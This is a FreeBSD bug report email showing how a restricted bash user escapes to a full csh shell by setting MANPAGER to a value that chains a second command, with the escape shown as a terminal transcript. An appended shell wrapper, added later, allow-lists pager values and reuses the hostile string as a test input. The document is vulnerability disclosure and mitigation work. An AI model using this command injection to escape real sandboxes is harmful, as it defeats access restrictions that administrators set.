Date:      Fri, 05 Feb 2016 08:51:00 +0000
From:      bugzilla-noreply@freebsd.org
To:        freebsd-bugs@FreeBSD.org
Subject:   [Bug 206946] possibility to escape restricted shell using custom MANPAGER variable when user has access to man(1)
Message-ID:  <bug-206946-8@https.bugs.freebsd.org/bugzilla/>

https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=206946

            Bug ID: 206946
           Summary: possibility to escape restricted shell using custom
                    MANPAGER variable when user has access to man(1)
           Product: Base System
           Version: 10.2-RELEASE
          Hardware: Any
                OS: Any
            Status: New
          Severity: Affects Many People
          Priority: ---
         Component: bin
          Assignee: freebsd-bugs@FreeBSD.org
          Reporter: ilavsky.martin@gmail.com

OS: FreeBSD 10.2 amd64 (but works on other versions/archs too).

User is set as:

# pw user show whoo
whoo:<passwd hash>/:1002:1002::0:0:User &:/home/whoo:/usr/local/bin/rbash
#

# pwd; ls -lad . .bash*
/home/whoo
drwx------  3 whoo  whoo    15 Feb  4 20:55 .
-rw-------  1 whoo  whoo  1677 Feb  4 23:54 .bash_history
-rw-r--r--  1 root  whoo    35 Feb  4 20:56 .bash_profile
#

# grep PATH .bash_profile
PATH="/home/whoo/bin"
export PATH
#
# ls -la /home/whoo/bin/
total 130
drwxr-xr-x  2 root  whoo        4 Feb  4 23:43 .
drwx------  3 whoo  whoo       15 Feb  4 20:55 ..
-r-xr-xr-x  1 root  wheel   21082 Feb  4 23:42 man
-r-xr-xr-x  1 root  wheel  150216 Sep  4 16:07 more
#

man and more are copied from FreeBSD's /usr/bin.
When logged as user `whoo':

$ cd /
-rbash: cd: restricted
$

$ find
-rbash: find: command not found
$

$ ls
-rbash: ls: command not found
$

$ unset PATH
-rbash: unset: PATH: cannot unset: readonly variable
$


But with specially set MANPAGER:

$ export MANPAGER="/usr/bin/less ; /bin/csh"
$

$ man man
/home/whoo/bin/man: head: not found
eval: tbl: not found
eval: groff: not found
whoo@tbsd01:~ %

whoo@tbsd01:~ % setenv PATH "/bin:/usr/bin:/sbin:/usr/sbin"
whoo@tbsd01:~ %

whoo@tbsd01:~ % cd /
whoo@tbsd01:/ % ls -la | head -6
total 138
drwxr-xr-x  22 root  wheel    28 Jan 15 14:26 .
drwxr-xr-x  22 root  wheel    28 Jan 15 14:26 ..
-rw-r--r--   2 root  wheel   966 Nov 11  2014 .cshrc
-rw-r--r--   2 root  wheel   254 Nov 11  2014 .profile
-rw-------   1 root  wheel  1024 Feb 24  2015 .rnd
whoo@tbsd01:/ %

whoo@tbsd01:/tmp % ls
blob00                          conftest79193
install.dMvSoF9f                mc-root
mergemaster.mtree.fDhpjfhQ      screens
whoo@tbsd01:/tmp %

-- 
You are receiving this mail because:
You are the assignee for the bug.
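
A mitigation sketch for the behaviour reported above, added here as an example and not part of the original report or of FreeBSD: a wrapper that replaces any user-supplied MANPAGER/PAGER with an allow-listed absolute path before man(1) runs, so a value containing `;` never reaches man's command line (the `eval:` messages in the transcript suggest that is where it ends up). The names `ALLOWED_PAGERS`, `DEFAULT_PAGER`, `REAL_MAN`, `pager_is_safe`, `choose_pager` and `safe_man` are hypothetical, and the paths are assumptions based on the layout shown in the report.

```sh
#!/bin/sh
# Added sketch, not FreeBSD's or the reporter's code. The three values below
# are assumptions chosen to match the layout shown in the report.
ALLOWED_PAGERS="/home/whoo/bin/more"    # space-separated allow-list
DEFAULT_PAGER="/home/whoo/bin/more"
REAL_MAN="/usr/bin/man"

# Return 0 only if $1 is exactly one allow-listed absolute path.
pager_is_safe() {
    candidate=$1
    case $candidate in
        ''|*[!A-Za-z0-9/._-]*) return 1 ;;  # empty, whitespace or shell metacharacter
        /*) ;;                              # absolute path: keep checking
        *) return 1 ;;                      # relative name: reject
    esac
    for allowed in $ALLOWED_PAGERS; do
        if [ "$candidate" = "$allowed" ]; then
            return 0
        fi
    done
    return 1
}

# Print the pager to use: the caller's value if it is safe, else the default.
choose_pager() {
    if pager_is_safe "$1"; then
        printf '%s\n' "$1"
    else
        printf '%s\n' "$DEFAULT_PAGER"
    fi
}

# Wrapper entry point: overwrite both pager variables, then run the real man.
safe_man() {
    MANPAGER=$(choose_pager "${MANPAGER:-}")
    PAGER=$MANPAGER
    export MANPAGER PAGER
    exec "$REAL_MAN" "$@"
}

# Constructed sample values; the second is the MANPAGER string from the report.
for value in "/home/whoo/bin/more" "/usr/bin/less ; /bin/csh" "more"; do
    printf '%-26s -> %s\n' "$value" "$(choose_pager "$value")"
done
```

Deployed as a root-owned script named man in the restricted account's PATH, the file would end with `safe_man "$@"` instead of the sample loop. Marking MANPAGER and PAGER `readonly` in the root-owned .bash_profile addresses the same gap from the shell side.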


